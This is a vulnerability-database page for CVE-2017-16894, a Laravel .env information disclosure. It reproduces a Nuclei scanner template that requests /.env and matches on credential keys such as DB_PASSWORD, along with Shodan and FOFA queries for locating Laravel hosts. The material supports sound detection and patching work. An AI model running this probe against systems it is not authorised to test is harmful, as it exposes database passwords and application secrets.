Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-16894
HistoryApr 13, 2023 - 5:38 a.m.

Laravel <5.5.21 - Information Disclosure

2023-04-1305:38:32
ProjectDiscovery
github.com
39
laravel
information disclosure
cve-2017-16894
exposure
packetstorm

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.116

Percentile

95.3%

Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
id: CVE-2017-16894

info:
  name: Laravel <5.5.21 - Information Disclosure
  author: j4vaovo
  severity: high
  description: |
    Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the application.
  remediation: |
    Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
    - https://packetstormsecurity.com/files/cve/CVE-2017-16894
    - http://whiteboyz.xyz/laravel-env-file-vuln.html
    - https://twitter.com/finnwea/status/967709791442341888
    - https://nvd.nist.gov/vuln/detail/CVE-2017-16894
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-16894
    cwe-id: CWE-200
    epss-score: 0.11608
    epss-percentile: 0.95145
    cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: laravel
    product: laravel
    shodan-query:
      - Laravel-Framework
      - cpe:"cpe:2.3:a:laravel:laravel"
      - laravel-framework
    fofa-query:
      - app="Laravel-Framework"
      - app="laravel-framework"
  tags: cve,cve2017,laravel,exposure,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "APP_NAME="
          - "APP_DEBUG="
          - "DB_PASSWORD="
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e844fde3edb6cce52d63d6465509d56be598412ecc7a783c99f95e5048fa0b28022000e7f92703c7e0130e41822de0a042d152f2ca780d45bb758994da36ee747c8e:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.116

Percentile

95.3%